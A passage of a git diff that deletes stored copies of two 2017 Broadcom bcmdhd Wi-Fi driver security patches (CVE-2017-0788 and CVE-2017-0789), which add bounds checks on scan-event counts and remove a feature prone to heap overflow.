-+	((EVENT_DATABUF_MAXLEN - sizeof(wl_pfn_scanresults_t)) \
-+	/ sizeof(wl_pfn_net_info_t) + 1)
-+
- #ifdef GSCAN_SUPPORT
- static int _dhd_pno_flush_ssid(dhd_pub_t *dhd);
- static wl_pfn_gscan_ch_bucket_cfg_t *
-@@ -3575,7 +3580,12 @@ dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data, uint32 event, int
- 	if (event == WLC_E_PFN_NET_FOUND || event == WLC_E_PFN_NET_LOST) {
- 		wl_pfn_scanresults_t *pfn_result = (wl_pfn_scanresults_t *)data;
- 		wl_pfn_net_info_t *net;
--
-+		if ((pfn_result->count == 0) ||
-+		    (pfn_result->count > EVENT_MAX_NETCNT)) {
-+			DHD_ERROR(("%s event %d: incorrect results count:%d\n",
-+				__FUNCTION__, event, pfn_result->count));
-+			return NULL;
-+		}
- 		if (pfn_result->version != PFN_SCANRESULT_VERSION) {
- 			DHD_ERROR(("%s event %d: Incorrect version %d %d\n", __FUNCTION__, event,
- 			          pfn_result->version, PFN_SCANRESULT_VERSION));
-@@ -3690,7 +3700,9 @@ void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data, int *s
- 
- 	gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);
- 
--	if (!results->count) {
-+	if ((results->count == 0) || (results->count > EVENT_MAX_NETCNT)) {
-+		DHD_ERROR(("%s: wrong count:%d\n", __FUNCTION__,
-+				results->count));
- 		*send_evt_bytes = 0;
- 		return ptr;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0788/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0788/ANY/0001.patch
deleted file mode 100644
index 8acfe027..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0788/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 08ccf853c567bf02f4a5c9f9aef19a40ecdf57d1 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Mon, 5 Jun 2017 14:39:26 -0700
-Subject: net: wireless: bcmdhd: adding boundary check for pfn events
-
-adding boundary check for bssid count in dhd_pno_process_epno_result
-and dhd_handle_hotlist_scan_evt function to prevent heap overflow.
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Bug: 37722328
-Bug: 37722970
-Change-Id: I1f0bc25ef4e7f5ba8f1aa9d9271919ee84d780a1
----
- drivers/net/wireless/bcmdhd/dhd_pno.c | 16 ++++++++++++++--
- 1 file changed, 14 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index 8ebdf53..1a8e4ee 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -92,6 +92,11 @@
- #define ENTRY_OVERHEAD strlen("bssid=\nssid=\nfreq=\nlevel=\nage=\ndist=\ndistSd=\n====")
- #define TIME_MIN_DIFF 5
- 
-+#define EVENT_DATABUF_MAXLEN	(512 - sizeof(bcm_event_t))
-+#define EVENT_MAX_NETCNT \
-+	((EVENT_DATABUF_MAXLEN - sizeof(wl_pfn_scanresults_t)) \
-+	/ sizeof(wl_pfn_net_info_t) + 1)
-+
- #ifdef GSCAN_SUPPORT
- static int _dhd_pno_flush_ssid(dhd_pub_t *dhd);
- static wl_pfn_gscan_ch_bucket_cfg_t *
-@@ -3575,7 +3580,12 @@ dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data, uint32 event, int
- 	if (event == WLC_E_PFN_NET_FOUND || event == WLC_E_PFN_NET_LOST) {
- 		wl_pfn_scanresults_t *pfn_result = (wl_pfn_scanresults_t *)data;
- 		wl_pfn_net_info_t *net;
--
-+		if ((pfn_result->count == 0) ||
-+		    (pfn_result->count > EVENT_MAX_NETCNT)) {
-+			DHD_ERROR(("%s event %d: incorrect results count:%d\n",
-+				__FUNCTION__, event, pfn_result->count));
-+			return NULL;
-+		}
- 		if (pfn_result->version != PFN_SCANRESULT_VERSION) {
- 			DHD_ERROR(("%s event %d: Incorrect version %d %d\n", __FUNCTION__, event,
- 			          pfn_result->version, PFN_SCANRESULT_VERSION));
-@@ -3690,7 +3700,9 @@ void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data, int *s
- 
- 	gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);
- 
--	if (!results->count) {
-+	if ((results->count == 0) || (results->count > EVENT_MAX_NETCNT)) {
-+		DHD_ERROR(("%s: wrong count:%d\n", __FUNCTION__,
-+				results->count));
- 		*send_evt_bytes = 0;
- 		return ptr;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0789/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0789/ANY/0001.patch
deleted file mode 100644
index 4ff22daf..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0789/ANY/0001.patch
+++ /dev/null
@@ -1,661 +0,0 @@
-From 58168423faa39f5062047eb1d16d294902f0f48b Mon Sep 17 00:00:00 2001
-From: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-Date: Thu, 22 Jun 2017 11:48:53 -0700
-Subject: net: wireless: bcmdhd: Remove "dhd_handle_swc_evt" from dhd.
-
-Remove SWC(siginificant wifi change) from the host. Since current
-feature is no longer being used. If needed will get the feature
-back. Due to this there will not any heap overflow in
-"dhd_handle_swc_evt" will be observed.
-
-Signed-off-by: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-Bug: 37685267
-Change-Id: Ib03a39626223e27079f2b3f91564eb21025e57cf
----
- drivers/net/wireless/bcmdhd/bcmevent.c             |   1 -
- drivers/net/wireless/bcmdhd/dhd_common.c           |   1 -
- drivers/net/wireless/bcmdhd/dhd_linux.c            |   9 -
- drivers/net/wireless/bcmdhd/dhd_pno.c              | 240 +--------------------
- drivers/net/wireless/bcmdhd/dhd_pno.h              |  45 ++--
- .../net/wireless/bcmdhd/include/proto/bcmevent.h   |   2 +-
- drivers/net/wireless/bcmdhd/include/wlioctl.h      |   6 -
- drivers/net/wireless/bcmdhd/wl_cfg80211.c          |   9 -
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c         | 108 ----------
- 9 files changed, 22 insertions(+), 399 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/bcmevent.c b/drivers/net/wireless/bcmdhd/bcmevent.c
-index 7ed9739..30e10d9 100644
---- a/drivers/net/wireless/bcmdhd/bcmevent.c
-+++ b/drivers/net/wireless/bcmdhd/bcmevent.c
-@@ -157,7 +157,6 @@ static const bcmevent_name_str_t bcmevent_names[] = {
- 	BCMEVENT_NAME(WLC_E_TXFAIL_THRESH),
- #ifdef GSCAN_SUPPORT
- 	BCMEVENT_NAME(WLC_E_PFN_GSCAN_FULL_RESULT),
--	BCMEVENT_NAME(WLC_E_PFN_SWC),
- #endif /* GSCAN_SUPPORT */
- #ifdef WLBSSLOAD_REPORT
- 	BCMEVENT_NAME(WLC_E_BSS_LOAD),
-diff --git a/drivers/net/wireless/bcmdhd/dhd_common.c b/drivers/net/wireless/bcmdhd/dhd_common.c
-index 1fbb5c4..d3f04a7 100644
---- a/drivers/net/wireless/bcmdhd/dhd_common.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_common.c
-@@ -1325,7 +1325,6 @@ wl_show_host_event(dhd_pub_t *dhd_pub, wl_event_msg_t *event, void *event_data,
- 	case WLC_E_PFN_SCAN_NONE:
- 	case WLC_E_PFN_SCAN_ALLGONE:
- 	case WLC_E_PFN_GSCAN_FULL_RESULT:
--	case WLC_E_PFN_SWC:
- 	case WLC_E_PFN_SSID_EXT:
- 		DHD_EVENT(("PNOEVENT: %s\n", event_name));
- 		break;
-diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c
-index abc4331..101b03a 100644
---- a/drivers/net/wireless/bcmdhd/dhd_linux.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c
-@@ -6066,7 +6066,6 @@ dhd_preinit_ioctls(dhd_pub_t *dhd)
- #ifdef GSCAN_SUPPORT
- 		setbit(eventmask_msg->mask, WLC_E_PFN_GSCAN_FULL_RESULT);
- 		setbit(eventmask_msg->mask, WLC_E_PFN_SCAN_COMPLETE);
--		setbit(eventmask_msg->mask, WLC_E_PFN_SWC);
- 		setbit(eventmask_msg->mask, WLC_E_PFN_SSID_EXT);
- 		setbit(eventmask_msg->mask, WLC_E_ROAM_EXP_EVENT);
- #endif /* GSCAN_SUPPORT */
-@@ -8401,14 +8400,6 @@ int dhd_dev_pno_enable_full_scan_result(struct net_device *dev, bool real_time_f
- 	return (dhd_pno_enable_full_scan_result(&dhd->pub, real_time_flag));
- }
- 
--/* Linux wrapper to call common dhd_handle_swc_evt */
--void * dhd_dev_swc_scan_event(struct net_device *dev, const void  *data, int *send_evt_bytes)
--{
--	dhd_info_t *dhd = *(dhd_info_t **)netdev_priv(dev);
--
--	return (dhd_handle_swc_evt(&dhd->pub, data, send_evt_bytes));
--}
--
- /* Linux wrapper to call common dhd_handle_hotlist_scan_evt */
- void * dhd_dev_hotlist_scan_event(struct net_device *dev,
-       const void  *data, int *send_evt_bytes, hotlist_type_t type)
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index 3103f89..8ebdf53 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -1028,34 +1028,6 @@ exit:
- 	return err;
- }
- 
--#ifdef GSCAN_SUPPORT
--static int
--_dhd_pno_add_significant_bssid(dhd_pub_t *dhd,
--   wl_pfn_significant_bssid_t *p_pfn_significant_bssid, int nbssid)
--{
--	int err = BCME_OK;
--	NULL_CHECK(dhd, "dhd is NULL", err);
--
--	if (!nbssid) {
--		err = BCME_ERROR;
--		goto exit;
--	}
--
--	NULL_CHECK(p_pfn_significant_bssid, "bssid list is NULL", err);
--
--	err = dhd_iovar(dhd, 0, "pfn_add_swc_bssid",
--			(char *)p_pfn_significant_bssid,
--			sizeof(wl_pfn_significant_bssid_t) * nbssid, NULL, 0,
--			TRUE);
--	if (err < 0) {
--		DHD_ERROR(("%s : failed to execute pfn_significant_bssid %d\n", __FUNCTION__, err));
--		goto exit;
--	}
--exit:
--	return err;
--}
--#endif /* GSCAN_SUPPORT */
--
- int
- dhd_pno_stop_for_ssid(dhd_pub_t *dhd)
- {
-@@ -1654,19 +1626,6 @@ static void dhd_pno_reset_cfg_gscan(dhd_pno_params_t *_params,
- 		_params->params_gscan.nbssid_hotlist = 0;
- 		DHD_PNO(("Flush Hotlist Config\n"));
- 	}
--	if (flags & GSCAN_FLUSH_SIGNIFICANT_CFG) {
--		dhd_pno_significant_bssid_t *iter, *next;
--
--		if (_params->params_gscan.nbssid_significant_change > 0) {
--			list_for_each_entry_safe(iter, next,
--				&_params->params_gscan.significant_bssid_list, list) {
--				list_del(&iter->list);
--				kfree(iter);
--			}
--		}
--		_params->params_gscan.nbssid_significant_change = 0;
--		DHD_PNO(("Flush Significant Change Config\n"));
--	}
- 	if (flags & GSCAN_FLUSH_EPNO_CFG) {
- 		dhd_pno_ssid_t *iter, *next;
- 		dhd_epno_ssid_cfg_t *epno_cfg = &_params->params_gscan.epno_cfg;
-@@ -1808,8 +1767,10 @@ void * dhd_pno_get_gscan(dhd_pub_t *dhd, dhd_pno_gscan_cmd_cfg_t type,
- 			ptr->max_ap_cache_per_scan = GSCAN_MAX_AP_CACHE_PER_SCAN;
- 			ptr->max_rssi_sample_size = PFN_SWC_RSSI_WINDOW_MAX;
- 			ptr->max_scan_reporting_threshold = 100;
--			ptr->max_hotlist_aps = PFN_HOTLIST_MAX_NUM_APS;
--			ptr->max_significant_wifi_change_aps = PFN_SWC_MAX_NUM_APS;
-+			ptr->max_hotlist_bssids = PFN_HOTLIST_MAX_NUM_APS;
-+			ptr->max_hotlist_ssids = 0;
-+			ptr->max_significant_wifi_change_aps = 0;
-+			ptr->max_bssid_history_entries = 0;
- 			ptr->max_epno_ssid_crc32 = MAX_EPNO_SSID_NUM;
- 			ptr->max_epno_hidden_ssid = MAX_EPNO_HIDDEN_SSID;
- 			ptr->max_white_list_ssid = MAX_WHITELIST_SSID;
-@@ -1943,10 +1904,10 @@ int dhd_pno_set_cfg_gscan(dhd_pub_t *dhd, dhd_pno_gscan_cmd_cfg_t type,
- 				INIT_LIST_HEAD(&_params->params_gscan.hotlist_bssid_list);
- 
- 			if ((_params->params_gscan.nbssid_hotlist +
--			          ptr->nbssid) > PFN_SWC_MAX_NUM_APS) {
-+				ptr->nbssid) > PFN_SWC_MAX_NUM_APS) {
- 				DHD_ERROR(("Excessive number of hotlist APs programmed %d\n",
--				     (_params->params_gscan.nbssid_hotlist +
--				      ptr->nbssid)));
-+					(_params->params_gscan.nbssid_hotlist +
-+					ptr->nbssid)));
- 				err = BCME_RANGE;
- 				goto exit;
- 			}
-@@ -1972,61 +1933,6 @@ int dhd_pno_set_cfg_gscan(dhd_pub_t *dhd, dhd_pno_gscan_cmd_cfg_t type,
- 			_params->params_gscan.lost_ap_window = ptr->lost_ap_window;
- 		}
- 		break;
--	case DHD_PNO_SIGNIFICANT_SCAN_CFG_ID:
--		{
--			gscan_swc_params_t *ptr = (gscan_swc_params_t *)buf;
--			dhd_pno_significant_bssid_t *_pno_significant_change_bssid;
--			wl_pfn_significant_bssid_t *significant_bssid_ptr;
--
--			if (flush) {
--				dhd_pno_reset_cfg_gscan(_params, _pno_state,
--				   GSCAN_FLUSH_SIGNIFICANT_CFG);
--			}
--
--			if (!ptr->nbssid)
--				break;
--
--			if (!_params->params_gscan.nbssid_significant_change)
--				INIT_LIST_HEAD(&_params->params_gscan.significant_bssid_list);
--
--			if ((_params->params_gscan.nbssid_significant_change +
--			          ptr->nbssid) > PFN_SWC_MAX_NUM_APS) {
--				DHD_ERROR(("Excessive number of SWC APs programmed %d\n",
--				     (_params->params_gscan.nbssid_significant_change +
--				      ptr->nbssid)));
--				err = BCME_RANGE;
--				goto exit;
--			}
--
--			for (i = 0, significant_bssid_ptr = ptr->bssid_elem_list;
--			     i < ptr->nbssid; i++, significant_bssid_ptr++) {
--				_pno_significant_change_bssid =
--				      kzalloc(sizeof(dhd_pno_significant_bssid_t),
--				      GFP_KERNEL);
--
--				if (!_pno_significant_change_bssid) {
--					DHD_ERROR(("SWC bssidptr is NULL, cannot kalloc %zd bytes",
--					sizeof(dhd_pno_significant_bssid_t)));
--					err = BCME_NOMEM;
--					goto exit;
--				}
--				memcpy(&_pno_significant_change_bssid->BSSID,
--				    &significant_bssid_ptr->macaddr, ETHER_ADDR_LEN);
--				_pno_significant_change_bssid->rssi_low_threshold =
--				    significant_bssid_ptr->rssi_low_threshold;
--				_pno_significant_change_bssid->rssi_high_threshold =
--				    significant_bssid_ptr->rssi_high_threshold;
--				list_add_tail(&_pno_significant_change_bssid->list,
--				    &_params->params_gscan.significant_bssid_list);
--			}
--
--			_params->params_gscan.swc_nbssid_threshold = ptr->swc_threshold;
--			_params->params_gscan.swc_rssi_window_size = ptr->rssi_window;
--			_params->params_gscan.lost_ap_window = ptr->lost_ap_window;
--			_params->params_gscan.nbssid_significant_change += ptr->nbssid;
--
--		}
--		break;
- 	case DHD_PNO_SCAN_CFG_ID:
- 		{
- 			int i, k;
-@@ -2145,7 +2051,6 @@ dhd_pno_set_for_gscan(dhd_pub_t *dhd, struct dhd_pno_gscan_params *gscan_params)
- 	dhd_pno_status_info_t *_pno_state = PNO_GET_PNOSTATE(dhd);
- 	wl_pfn_gscan_ch_bucket_cfg_t *ch_bucket = NULL;
- 	wl_pfn_gscan_cfg_t *pfn_gscan_cfg_t = NULL;
--	wl_pfn_significant_bssid_t *p_pfn_significant_bssid = NULL;
- 	wl_pfn_bssid_t *p_pfn_bssid = NULL;
- 	dhd_pno_params_t	*params_legacy;
- 	dhd_pno_params_t	*_params;
-@@ -2219,7 +2124,8 @@ dhd_pno_set_for_gscan(dhd_pub_t *dhd, struct dhd_pno_gscan_params *gscan_params)
- 
- 	gscan_param_size = sizeof(wl_pfn_gscan_cfg_t) +
- 	          (num_buckets_to_fw - 1) * sizeof(wl_pfn_gscan_ch_bucket_cfg_t);
--	pfn_gscan_cfg_t = (wl_pfn_gscan_cfg_t *) MALLOC(dhd->osh, gscan_param_size);
-+	pfn_gscan_cfg_t = (wl_pfn_gscan_cfg_t *)
-+			MALLOCZ(dhd->osh, gscan_param_size);
- 
- 	if (!pfn_gscan_cfg_t) {
- 		DHD_ERROR(("%s: failed to malloc memory of size %d\n",
-@@ -2234,16 +2140,6 @@ dhd_pno_set_for_gscan(dhd_pub_t *dhd, struct dhd_pno_gscan_params *gscan_params)
- 	else
- 		pfn_gscan_cfg_t->buffer_threshold = GSCAN_BATCH_NO_THR_SET;
- 
--	if (gscan_params->nbssid_significant_change) {
--		pfn_gscan_cfg_t->swc_nbssid_threshold = gscan_params->swc_nbssid_threshold;
--		pfn_gscan_cfg_t->swc_rssi_window_size = gscan_params->swc_rssi_window_size;
--		pfn_gscan_cfg_t->lost_ap_window	= gscan_params->lost_ap_window;
--	} else {
--		pfn_gscan_cfg_t->swc_nbssid_threshold = 0;
--		pfn_gscan_cfg_t->swc_rssi_window_size = 0;
--		pfn_gscan_cfg_t->lost_ap_window	= 0;
--	}
--
- 	pfn_gscan_cfg_t->flags =
- 	         (gscan_params->send_all_results_flag & GSCAN_SEND_ALL_RESULTS_MASK);
- 	pfn_gscan_cfg_t->count_of_channel_buckets = num_buckets_to_fw;
-@@ -2277,38 +2173,6 @@ dhd_pno_set_for_gscan(dhd_pub_t *dhd, struct dhd_pno_gscan_params *gscan_params)
- 			__FUNCTION__, err));
- 		goto exit;
- 	}
--	if (gscan_params->nbssid_significant_change) {
--		dhd_pno_significant_bssid_t *iter, *next;
--
--		p_pfn_significant_bssid = kzalloc(sizeof(wl_pfn_significant_bssid_t) *
--		                   gscan_params->nbssid_significant_change, GFP_KERNEL);
--		if (p_pfn_significant_bssid == NULL) {
--			DHD_ERROR(("%s : failed to allocate memory %zd\n",
--				__FUNCTION__,
--				sizeof(wl_pfn_significant_bssid_t) *
--				gscan_params->nbssid_significant_change));
--			err = BCME_NOMEM;
--			goto exit;
--		}
--		i = 0;
--		/* convert dhd_pno_significant_bssid_t to wl_pfn_significant_bssid_t */
--		list_for_each_entry_safe(iter, next, &gscan_params->significant_bssid_list, list) {
--			p_pfn_significant_bssid[i].rssi_low_threshold = iter->rssi_low_threshold;
--			p_pfn_significant_bssid[i].rssi_high_threshold = iter->rssi_high_threshold;
--			memcpy(&p_pfn_significant_bssid[i].macaddr, &iter->BSSID, ETHER_ADDR_LEN);
--			i++;
--		}
--
--		DHD_PNO(("nbssid_significant_change %d \n",
--		    gscan_params->nbssid_significant_change));
--		err = _dhd_pno_add_significant_bssid(dhd, p_pfn_significant_bssid,
--		 gscan_params->nbssid_significant_change);
--		if (err < 0) {
--			DHD_ERROR(("%s : failed to call _dhd_pno_add_significant_bssid(err :%d)\n",
--				__FUNCTION__, err));
--			goto exit;
--		}
--	}
- 	/* Reprogram ePNO cfg from dhd cache if FW has been flushed */
- 	if (fw_flushed) {
- 		dhd_pno_set_epno(dhd);
-@@ -2362,7 +2226,6 @@ exit:
- 			_pno_state->pno_mode &= ~DHD_PNO_GSCAN_MODE;
- 		}
- 	}
--	kfree(p_pfn_significant_bssid);
- 	kfree(p_pfn_bssid);
- 	if (pfn_gscan_cfg_t)
- 		MFREE(dhd->osh, pfn_gscan_cfg_t, gscan_param_size);
-@@ -3581,91 +3444,6 @@ int dhd_retreive_batch_scan_results(dhd_pub_t *dhd)
- 	return err;
- }
- 
--/* Handle Significant WiFi Change (SWC) event from FW
-- * Send event to HAL when all results arrive from FW
-- */
--void * dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes)
--{
--	void *ptr = NULL;
--	dhd_pno_status_info_t *_pno_state = PNO_GET_PNOSTATE(dhd);
--	struct dhd_pno_gscan_params *gscan_params;
--	struct dhd_pno_swc_evt_param *params;
--	wl_pfn_swc_results_t *results = (wl_pfn_swc_results_t *)event_data;
--	wl_pfn_significant_net_t *change_array;
--	int i;
--
--	gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);
--	params = &(gscan_params->param_significant);
--
--	if (!results->total_count) {
--		*send_evt_bytes = 0;
--		return ptr;
--	}
--
--	if (!params->results_rxed_so_far) {
--		if (!params->change_array) {
--			params->change_array = (wl_pfn_significant_net_t *)
--			kmalloc(sizeof(wl_pfn_significant_net_t) * results->total_count,
--			GFP_KERNEL);
--
--			if (!params->change_array) {
--				DHD_ERROR(("%s Cannot Malloc %zd bytes!!\n", __FUNCTION__,
--				sizeof(wl_pfn_significant_net_t) * results->total_count));
--				*send_evt_bytes = 0;
--				return ptr;
--			}
--		} else {
--			DHD_ERROR(("RX'ed WLC_E_PFN_SWC evt from FW, previous evt not complete!!"));
--			*send_evt_bytes = 0;
--			return ptr;
--		}
--
--	}
--
--	DHD_PNO(("%s: pkt_count %d total_count %d\n", __FUNCTION__,
--	results->pkt_count, results->total_count));
--
--	for (i = 0; i < results->pkt_count; i++) {
--		DHD_PNO(("\t %02x:%02x:%02x:%02x:%02x:%02x\n",
--		results->list[i].BSSID.octet[0],
--		results->list[i].BSSID.octet[1],
--		results->list[i].BSSID.octet[2],
--		results->list[i].BSSID.octet[3],
--		results->list[i].BSSID.octet[4],
--		results->list[i].BSSID.octet[5]));
--	}
--
--	change_array = &params->change_array[params->results_rxed_so_far];
--	if ((params->results_rxed_so_far + results->pkt_count) >
--		results->total_count) {
--		DHD_ERROR(("Error: Invalid data reset the counters!!\n"));
--		*send_evt_bytes = 0;
--		kfree(params->change_array);
--		params->change_array = NULL;
--		return ptr;
--	}
--
--	memcpy(change_array, results->list,
--		sizeof(wl_pfn_significant_net_t) * results->pkt_count);
--	params->results_rxed_so_far += results->pkt_count;
--
--	if (params->results_rxed_so_far == results->total_count) {
--		params->results_rxed_so_far = 0;
--		*send_evt_bytes = sizeof(wl_pfn_significant_net_t) * results->total_count;
--		/* Pack up change buffer to send up and reset
--		 * results_rxed_so_far, after its done.
--		 */
--		ptr = (void *) params->change_array;
--		/* expecting the callee to free this mem chunk */
--		params->change_array = NULL;
--	}
--	else {
--		*send_evt_bytes = 0;
--	}
--
--	return ptr;
--}
--
- void dhd_gscan_hotlist_cache_cleanup(dhd_pub_t *dhd, hotlist_type_t type)
- {
- 	dhd_pno_status_info_t *_pno_state = PNO_GET_PNOSTATE(dhd);
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.h b/drivers/net/wireless/bcmdhd/dhd_pno.h
-index 3398752..9a348f9 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.h
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.h
-@@ -359,16 +359,18 @@ typedef struct {
- } wifi_passpoint_network;
- 
- typedef struct dhd_pno_gscan_capabilities {
--    int max_scan_cache_size;
--    int max_scan_buckets;
--    int max_ap_cache_per_scan;
--    int max_rssi_sample_size;
--    int max_scan_reporting_threshold;
--    int max_hotlist_aps;
--    int max_significant_wifi_change_aps;
--    int max_epno_ssid_crc32;
--    int max_epno_hidden_ssid;
--    int max_white_list_ssid;
-+	int max_scan_cache_size;
-+	int max_scan_buckets;
-+	int max_ap_cache_per_scan;
-+	int max_rssi_sample_size;
-+	int max_scan_reporting_threshold;
-+	int max_hotlist_bssids;
-+	int max_hotlist_ssids;
-+	int max_significant_wifi_change_aps;
-+	int max_bssid_history_entries;
-+	int max_epno_ssid_crc32;
-+	int max_epno_hidden_ssid;
-+	int max_white_list_ssid;
- } dhd_pno_gscan_capabilities_t;
- 
- typedef struct dhd_epno_ssid_cfg {
-@@ -426,26 +428,6 @@ typedef struct gscan_hotlist_scan_params {
- 	struct bssid_t bssid[1];  /* n bssids to follow */
- } gscan_hotlist_scan_params_t;
- 
--/* SWC (Significant WiFi Change) params */
--typedef struct gscan_swc_params {
--	/* Rssi averaging window size */
--	uint8 rssi_window;
--	/* Number of scans that the AP has to be absent before
--	 * being declared LOST
--	 */
--	uint8 lost_ap_window;
--	/* if x  Aps have a significant change generate an event. */
--	uint8 swc_threshold;
--	uint8 nbssid;
--	wl_pfn_significant_bssid_t bssid_elem_list[1];
--} gscan_swc_params_t;
--
--typedef struct dhd_pno_significant_bssid {
--	struct ether_addr BSSID;
--	int8 rssi_low_threshold;
--	int8 rssi_high_threshold;
--	struct list_head list;
--} dhd_pno_significant_bssid_t;
- #endif /* GSCAN_SUPPORT */
- typedef union dhd_pno_params {
- 	struct dhd_pno_legacy_params params_legacy;
-@@ -506,8 +488,6 @@ int dhd_dev_pno_lock_access_batch_results(struct net_device *dev);
- void dhd_dev_pno_unlock_access_batch_results(struct net_device *dev);
- extern int dhd_dev_pno_run_gscan(struct net_device *dev, bool run, bool flush);
- extern int dhd_dev_pno_enable_full_scan_result(struct net_device *dev, bool real_time);
--extern void * dhd_dev_swc_scan_event(struct net_device *dev, const void  *data,
--              int *send_evt_bytes);
- int dhd_retreive_batch_scan_results(dhd_pub_t *dhd);
- extern void * dhd_dev_hotlist_scan_event(struct net_device *dev,
-                          const void  *data, int *send_evt_bytes, hotlist_type_t type);
-@@ -560,7 +540,6 @@ extern int dhd_pno_initiate_gscan_request(dhd_pub_t *dhd, bool run, bool flush);
- extern int dhd_pno_enable_full_scan_result(dhd_pub_t *dhd, bool real_time_flag);
- extern int dhd_pno_cfg_gscan(dhd_pub_t *dhd, dhd_pno_gscan_cmd_cfg_t type, void *buf);
- extern int dhd_dev_retrieve_batch_scan(struct net_device *dev);
--extern void *dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes);
- extern void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data,
-                        int *send_evt_bytes, hotlist_type_t type);
- extern void *
-diff --git a/drivers/net/wireless/bcmdhd/include/proto/bcmevent.h b/drivers/net/wireless/bcmdhd/include/proto/bcmevent.h
-index 098da15..d6f7cd4 100644
---- a/drivers/net/wireless/bcmdhd/include/proto/bcmevent.h
-+++ b/drivers/net/wireless/bcmdhd/include/proto/bcmevent.h
-@@ -236,7 +236,7 @@ typedef union bcm_event_msg_u {
- #define WLC_E_FBT_AUTH_REQ_IND		132	/* FBT Authentication Request Indication */
- #define WLC_E_RSSI_LQM			133	/* Enhancement addition for WLC_E_RSSI */
- #define WLC_E_PFN_GSCAN_FULL_RESULT		134 /* Full probe/beacon (IEs etc) results */
--#define WLC_E_PFN_SWC		135 /* Significant change in rssi of bssids being tracked */
-+/* 135 was legacy entry for WLC_E_PFN_SWC can be reused */
- #define WLC_E_PFN_SCAN_COMPLETE		138	/* PFN completed scan of network list */
- #define WLC_E_RMC_EVENT			139	/* RMC event */
- #define WLC_E_PFN_SSID_EXT      142  /* SSID EXT event */
-diff --git a/drivers/net/wireless/bcmdhd/include/wlioctl.h b/drivers/net/wireless/bcmdhd/include/wlioctl.h
-index 808a0bf..b89c4be 100644
---- a/drivers/net/wireless/bcmdhd/include/wlioctl.h
-+++ b/drivers/net/wireless/bcmdhd/include/wlioctl.h
-@@ -2705,12 +2705,6 @@ typedef struct wl_pfn_bssid {
- 	uint16             flags;
- } wl_pfn_bssid_t;
- 
--typedef struct wl_pfn_significant_bssid {
--	struct ether_addr	macaddr;
--	int8    rssi_low_threshold;
--	int8    rssi_high_threshold;
--} wl_pfn_significant_bssid_t;
--
- #define WL_PFN_SUPPRESSFOUND_MASK	0x08
- #define WL_PFN_SUPPRESSLOST_MASK	0x10
- #define WL_PFN_RSSI_MASK		0xff00
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 1d1e2a8..e7ababd 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -9397,14 +9397,6 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 	u32 len = ntoh32(e->datalen);
- 
- 	switch (event) {
--		case WLC_E_PFN_SWC:
--			ptr = dhd_dev_swc_scan_event(ndev, data, &send_evt_bytes);
--			if (send_evt_bytes) {
--				wl_cfgvendor_send_async_event(wiphy, ndev,
--				    GOOGLE_GSCAN_SIGNIFICANT_EVENT, ptr, send_evt_bytes);
--				kfree(ptr);
--			}
--			break;
- 		case WLC_E_PFN_BEST_BATCHING:
- 			err = dhd_dev_retrieve_batch_scan(ndev);
- 			if (err < 0) {
-@@ -10094,7 +10086,6 @@ static void wl_init_event_handler(struct bcm_cfg80211 *cfg)
- 	cfg->evt_handler[WLC_E_PFN_BEST_BATCHING] = wl_notify_gscan_event;
- 	cfg->evt_handler[WLC_E_PFN_SCAN_COMPLETE] = wl_notify_gscan_event;
- 	cfg->evt_handler[WLC_E_PFN_GSCAN_FULL_RESULT] = wl_notify_gscan_event;
--	cfg->evt_handler[WLC_E_PFN_SWC] = wl_notify_gscan_event;
- 	cfg->evt_handler[WLC_E_PFN_BSSID_NET_FOUND] = wl_notify_gscan_event;
- 	cfg->evt_handler[WLC_E_PFN_BSSID_NET_LOST] = wl_notify_gscan_event;
- 	cfg->evt_handler[WLC_E_PFN_SSID_EXT] = wl_notify_gscan_event;
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
